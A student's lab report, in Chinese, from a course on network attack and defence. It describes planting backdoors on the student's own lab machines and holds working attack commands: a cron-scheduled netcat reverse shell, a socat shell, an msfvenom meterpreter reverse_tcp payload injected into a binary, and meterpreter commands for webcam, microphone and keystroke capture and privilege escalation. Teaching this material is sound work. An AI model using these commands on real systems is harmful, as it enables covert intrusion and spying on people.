20192417張家華 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告
1.實驗內容
1.實踐目標
(1)使用netcat獲取主機操作Shell,cron啟動某項任務(任務自定)
PS:cron是linux下用來週期性的執行某種任務或等待處理某些事件的一個守護程序
(2)使用socat獲取主機操作Shell, 任務計劃啟動
(3)使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
(4)使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。
2.實驗要求
-
掌握後門原理及免殺技術
-
回答問題
(1)例舉你能想到的一個後門進入到你係統中的可能方式?
答:下載軟體時,軟體被開發者有意或無意留下了後門,則主機被引入了後門
(2)例舉你知道的後門如何啟動起來(win及linux)的方式?
答:windows中:後門程式作為.exe檔案或者快捷方式,被使用者點選後啟動,或者安裝為服務後,進行自啟動; Linux中:後門程式被設定在cron等服務中實現自啟動
(3)Meterpreter有哪些給你映像深刻的功能?
答:可以開啟攝像頭、錄音、截圖、記錄鍵盤輸入字元
(4)如何發現自己有系統有沒有被安裝後門?
答:防毒軟體掃描;工作管理員檢視佔用記憶體和cpu資源的程式。
2.實驗過程
任務一:使用netcat獲取主機操作Shell,cron啟動某項任務
Windows主機ip地址為192.168.3.18,Kali虛擬機器ip地址為192.168.50.129
在kali虛擬機器執行指令crotab -e,在檔案的末尾新增* * * * * /bin/netcat 192.168.56.1 8888 -e /bin/sh
輸入ncat.exe -l -p 8888監聽8888埠
任務二:使用socat獲取主機操作Shell, 任務計劃啟動
把cmd.exe繫結到埠5055,在虛擬機器中輸入指令socat - tcp:192.168.3.18:5055,獲取主機操作shell
任務三:使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
在kali中輸入指令得到後門檔案20192417.exe,windows執行ncat.exe -l 7777 > 20192417.exe指令接收後門程式,kali虛擬機器中執行nc 192.168.3.18 7777 < 20192417.exe傳送後門程,在windows主機可以發現後門程式
在kali虛擬機器輸入msfconsole指令進入msf控制檯,設定ip地址與埠號等,最後輸入exploit開始監聽,執行windows後門程式,在kali上獲取主機shell
任務四 使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
在任務三基礎上,執行以下指令
record_mic:獲取音訊
webcam_snap:控制主機攝像頭拍照
screenshot:控制主機截圖
keyscan_start:記錄主機鍵盤輸入的過程
keyscan_dump:讀取鍵盤輸入的記錄(有序)
getsystem指令嘗試提權操作,提權失敗
任務五 使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell
kali虛擬機器上執行 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.50.129 LPORT=3333 -x /root/pwn20192412 -f elf >20192417pwn
在msf控制檯執行exploit進行監聽,開啟另外一個終端輸入./20192417pwn指令,可以發現在msf控制檯上成功獲取了linux的shell
3.問題及解決方案
- 問題1:傳送後門程式後發現雖然windows有這個程式但是檔案大小為0kB
- 問題1解決方案:防火牆沒關,阻止了後門程式的傳送
- 問題2:任務五監聽沒有反應
- 問題2解決方案:發現自己無意間生成了兩個20192417pwn檔案,而運行了另外一個20192417pwn檔案,與監聽的那個路徑不一樣所以監聽無反應
4.學習感悟、思考等
在本次實驗中我初步瞭解了後門程式的簡單使用,對msf控制檯一些功能的瞭解。在網路世界中後門程式可以起到非常大的作用,而msf控制檯利用後門程式可以神不知鬼不覺地獲取你的攝像頭、麥克風等許可權進行個人資訊的盜取。這次實驗給我帶來了後門與安全的最直接感受,而防火牆等防毒軟體的效果是顯而易見的。